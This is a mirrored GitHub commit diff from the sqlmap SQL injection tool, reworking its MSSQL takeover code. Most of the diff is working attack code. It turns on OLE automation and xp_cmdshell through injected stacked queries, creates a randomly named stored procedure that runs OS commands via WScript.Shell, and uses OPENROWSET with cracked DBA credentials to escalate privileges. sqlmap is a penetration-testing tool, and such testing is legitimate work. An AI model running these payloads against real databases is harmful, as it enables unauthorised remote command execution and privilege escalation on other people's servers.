mirror of
				https://github.com/sqlmapproject/sqlmap.git
				synced 2025-10-26 21:51:12 +03:00 
			
		
		
		
	more tweaking for issue #34, it's totally not as trivial as it may look (OPENROWSET has many limitations on MSSQL >= 2005)
This commit is contained in:
		
							parent
							
								
									b7d2680e55
								
							
						
					
					
						commit
						04d803c7fd
					
				|  | @ -11,6 +11,7 @@ from xml.etree import ElementTree as ET | ||||||
| 
 | 
 | ||||||
| from lib.core.common import Backend | from lib.core.common import Backend | ||||||
| from lib.core.common import extractRegexResult | from lib.core.common import extractRegexResult | ||||||
|  | from lib.core.common import getSPQLSnippet | ||||||
| from lib.core.common import isDBMSVersionAtLeast | from lib.core.common import isDBMSVersionAtLeast | ||||||
| from lib.core.common import isTechniqueAvailable | from lib.core.common import isTechniqueAvailable | ||||||
| from lib.core.common import randomInt | from lib.core.common import randomInt | ||||||
|  | @ -27,6 +28,7 @@ from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR | ||||||
| from lib.core.settings import FROM_DUMMY_TABLE | from lib.core.settings import FROM_DUMMY_TABLE | ||||||
| from lib.core.settings import GENERIC_SQL_COMMENT | from lib.core.settings import GENERIC_SQL_COMMENT | ||||||
| from lib.core.settings import PAYLOAD_DELIMITER | from lib.core.settings import PAYLOAD_DELIMITER | ||||||
|  | from lib.core.settings import SQL_STATEMENTS | ||||||
| from lib.core.unescaper import unescaper | from lib.core.unescaper import unescaper | ||||||
| 
 | 
 | ||||||
| class Agent: | class Agent: | ||||||
|  | @ -816,5 +818,20 @@ class Agent: | ||||||
| 
 | 
 | ||||||
|         return re.sub("(%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), "%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER), inpStr) if inpStr else inpStr |         return re.sub("(%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), "%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER), inpStr) if inpStr else inpStr | ||||||
| 
 | 
 | ||||||
|  |     def runAsDBMSUser(self, query): | ||||||
|  |         if conf.dCred and "Ad Hoc Distributed Queries" not in query: | ||||||
|  |             for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): | ||||||
|  |                 for sqlStatement in sqlStatements: | ||||||
|  |                     if query.lower().startswith(sqlStatement): | ||||||
|  |                         sqlType = sqlTitle | ||||||
|  |                         break | ||||||
|  | 
 | ||||||
|  |             if sqlType and "SELECT" not in sqlType: | ||||||
|  |                 query = "SELECT %d;%s" % (randomInt(), query) | ||||||
|  | 
 | ||||||
|  |             query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''")) | ||||||
|  | 
 | ||||||
|  |         return query | ||||||
|  | 
 | ||||||
| # SQL agent | # SQL agent | ||||||
| agent = Agent() | agent = Agent() | ||||||
|  |  | ||||||
|  | @ -10,13 +10,13 @@ from lib.core.common import dataToStdout | ||||||
| from lib.core.common import Backend | from lib.core.common import Backend | ||||||
| from lib.core.common import getSPQLSnippet | from lib.core.common import getSPQLSnippet | ||||||
| from lib.core.common import isTechniqueAvailable | from lib.core.common import isTechniqueAvailable | ||||||
|  | from lib.core.common import randomInt | ||||||
| from lib.core.common import readInput | from lib.core.common import readInput | ||||||
| from lib.core.data import conf | from lib.core.data import conf | ||||||
| from lib.core.data import logger | from lib.core.data import logger | ||||||
| from lib.core.enums import DBMS | from lib.core.enums import DBMS | ||||||
| from lib.core.enums import PAYLOAD | from lib.core.enums import PAYLOAD | ||||||
| from lib.core.exception import sqlmapUnsupportedFeatureException | from lib.core.exception import sqlmapUnsupportedFeatureException | ||||||
| from lib.core.settings import SQL_STATEMENTS |  | ||||||
| from lib.core.shell import autoCompletion | from lib.core.shell import autoCompletion | ||||||
| from lib.request import inject | from lib.request import inject | ||||||
| from lib.takeover.udf import UDF | from lib.takeover.udf import UDF | ||||||
|  | @ -38,21 +38,6 @@ class Abstraction(Web, UDF, xp_cmdshell): | ||||||
|         Web.__init__(self) |         Web.__init__(self) | ||||||
|         xp_cmdshell.__init__(self) |         xp_cmdshell.__init__(self) | ||||||
| 
 | 
 | ||||||
|     def runAsDBMSUser(self, query): |  | ||||||
|         if conf.dCred: |  | ||||||
|             for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): |  | ||||||
|                 for sqlStatement in sqlStatements: |  | ||||||
|                     if query.lower().startswith(sqlStatement): |  | ||||||
|                         sqlType = sqlTitle |  | ||||||
|                         break |  | ||||||
| 
 |  | ||||||
|             if sqlType and "SELECT" not in sqlType: |  | ||||||
|                 query = "SELECT 1;%s" % query |  | ||||||
| 
 |  | ||||||
|             query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''")) |  | ||||||
| 
 |  | ||||||
|         return query |  | ||||||
| 
 |  | ||||||
|     def execCmd(self, cmd, silent=False): |     def execCmd(self, cmd, silent=False): | ||||||
|         if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): |         if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): | ||||||
|             self.webBackdoorRunCmd(cmd) |             self.webBackdoorRunCmd(cmd) | ||||||
|  | @ -201,6 +186,13 @@ class Abstraction(Web, UDF, xp_cmdshell): | ||||||
|             if mandatory and not self.isDba(): |             if mandatory and not self.isDba(): | ||||||
|                 warnMsg = "the functionality requested might not work because " |                 warnMsg = "the functionality requested might not work because " | ||||||
|                 warnMsg += "the session user is not a database administrator" |                 warnMsg += "the session user is not a database administrator" | ||||||
|  | 
 | ||||||
|  |                 if not conf.dCred and Backend.getIdentifiedDbms() in ( DBMS.MSSQL, DBMS.PGSQL ): | ||||||
|  |                     warnMsg += ". You can try to provide --dbms-cred switch " | ||||||
|  |                     warnMsg += "to execute statements as a DBA user if you " | ||||||
|  |                     warnMsg += "were able to extract and crack a DBA " | ||||||
|  |                     warnMsg += "password by any mean" | ||||||
|  | 
 | ||||||
|                 logger.warn(warnMsg) |                 logger.warn(warnMsg) | ||||||
| 
 | 
 | ||||||
|             if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ): |             if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ): | ||||||
|  |  | ||||||
|  | @ -5,6 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/) | ||||||
| See the file 'doc/COPYING' for copying permission | See the file 'doc/COPYING' for copying permission | ||||||
| """ | """ | ||||||
| 
 | 
 | ||||||
|  | from lib.core.agent import agent | ||||||
| from lib.core.common import Backend | from lib.core.common import Backend | ||||||
| from lib.core.common import getSPQLSnippet | from lib.core.common import getSPQLSnippet | ||||||
| from lib.core.common import hashDBWrite | from lib.core.common import hashDBWrite | ||||||
|  | @ -43,23 +44,25 @@ class xp_cmdshell: | ||||||
|             cmd += "EXEC master..sp_configure 'show advanced options',1;" |             cmd += "EXEC master..sp_configure 'show advanced options',1;" | ||||||
|             cmd += "RECONFIGURE WITH OVERRIDE;" |             cmd += "RECONFIGURE WITH OVERRIDE;" | ||||||
|             cmd += "EXEC master..sp_configure 'ole automation procedures',1;" |             cmd += "EXEC master..sp_configure 'ole automation procedures',1;" | ||||||
|             cmd += "RECONFIGURE WITH OVERRIDE; " |             cmd += "RECONFIGURE WITH OVERRIDE" | ||||||
|             inject.goStacked(cmd) |             inject.goStacked(agent.runAsDBMSUser(cmd)) | ||||||
| 
 | 
 | ||||||
|         self.__randStr = randomStr(lowercase=True) |         self.__randStr = randomStr(lowercase=True) | ||||||
|  |         self.__xpCmdshellNew = randomStr(lowercase=True) | ||||||
|  |         self.xpCmdshellStr = "master..xp_%s" % self.__xpCmdshellNew | ||||||
| 
 | 
 | ||||||
|         cmd += "DECLARE @%s nvarchar(999); " % self.__randStr |         cmd = "DECLARE @%s nvarchar(999);" % self.__randStr | ||||||
|         cmd += "set @%s='" % self.__randStr |         cmd += "set @%s='" % self.__randStr | ||||||
|         cmd += "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int " |         cmd += "CREATE PROCEDURE xp_%s(@cmd varchar(255)) AS DECLARE @ID int " % self.__xpCmdshellNew | ||||||
|         cmd += "EXEC sp_OACreate ''WScript.Shell'',@ID OUT " |         cmd += "EXEC sp_OACreate ''WScript.Shell'',@ID OUT " | ||||||
|         cmd += "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 " |         cmd += "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 " | ||||||
|         cmd += "EXEC sp_OADestroy @ID';" |         cmd += "EXEC sp_OADestroy @ID';" | ||||||
|         cmd += "EXEC master..sp_executesql @%s;" % self.__randStr |         cmd += "EXEC master..sp_executesql @%s" % self.__randStr | ||||||
| 
 | 
 | ||||||
|         if Backend.isVersionWithin(("2005", "2008")): |         if Backend.isVersionWithin(("2005", "2008")): | ||||||
|             cmd += " RECONFIGURE WITH OVERRIDE;" |             cmd += ";RECONFIGURE WITH OVERRIDE" | ||||||
| 
 | 
 | ||||||
|         inject.goStacked(cmd) |         inject.goStacked(agent.runAsDBMSUser(cmd)) | ||||||
| 
 | 
 | ||||||
|     def __xpCmdshellConfigure2005(self, mode): |     def __xpCmdshellConfigure2005(self, mode): | ||||||
|         debugMsg = "configuring xp_cmdshell using sp_configure " |         debugMsg = "configuring xp_cmdshell using sp_configure " | ||||||
|  | @ -88,7 +91,7 @@ class xp_cmdshell: | ||||||
|         else: |         else: | ||||||
|             cmd = self.__xpCmdshellConfigure2000(mode) |             cmd = self.__xpCmdshellConfigure2000(mode) | ||||||
| 
 | 
 | ||||||
|         inject.goStacked(cmd) |         inject.goStacked(agent.runAsDBMSUser(cmd)) | ||||||
| 
 | 
 | ||||||
|     def __xpCmdshellCheck(self): |     def __xpCmdshellCheck(self): | ||||||
|         cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2) |         cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2) | ||||||
|  | @ -153,7 +156,7 @@ class xp_cmdshell: | ||||||
|         self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd) |         self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd) | ||||||
|         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr) |         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr) | ||||||
| 
 | 
 | ||||||
|         return self.runAsDBMSUser(self.__forgedCmd) |         return agent.runAsDBMSUser(self.__forgedCmd) | ||||||
| 
 | 
 | ||||||
|     def xpCmdshellExecCmd(self, cmd, silent=False): |     def xpCmdshellExecCmd(self, cmd, silent=False): | ||||||
|         cmd = self.xpCmdshellForgeCmd(cmd) |         cmd = self.xpCmdshellForgeCmd(cmd) | ||||||
|  |  | ||||||
|  | @ -3,4 +3,4 @@ RECONFIGURE WITH OVERRIDE; | ||||||
| EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%; | EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%; | ||||||
| RECONFIGURE WITH OVERRIDE; | RECONFIGURE WITH OVERRIDE; | ||||||
| EXEC sp_configure 'show advanced options', 0; | EXEC sp_configure 'show advanced options', 0; | ||||||
| RECONFIGURE WITH OVERRIDE; | RECONFIGURE WITH OVERRIDE | ||||||
|  |  | ||||||
|  | @ -3,4 +3,4 @@ RECONFIGURE WITH OVERRIDE; | ||||||
| EXEC master..sp_configure 'xp_cmdshell',%ENABLE%; | EXEC master..sp_configure 'xp_cmdshell',%ENABLE%; | ||||||
| RECONFIGURE WITH OVERRIDE; | RECONFIGURE WITH OVERRIDE; | ||||||
| EXEC sp_configure 'show advanced options',0; | EXEC sp_configure 'show advanced options',0; | ||||||
| RECONFIGURE WITH OVERRIDE; | RECONFIGURE WITH OVERRIDE | ||||||
|  |  | ||||||
|  | @ -1 +1 @@ | ||||||
| EXEC master..sp_dropextendedproc 'xp_cmdshell'; | EXEC master..sp_dropextendedproc 'xp_cmdshell' | ||||||
|  |  | ||||||
|  | @ -1 +1 @@ | ||||||
| EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'; | EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll' | ||||||
|  |  | ||||||
|  | @ -1 +1,2 @@ | ||||||
| SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%'); | SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%') | ||||||
|  | # SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','%STATEMENT%') | ||||||
|  |  | ||||||
		Loading…
	
		Reference in New Issue
	
	Block a user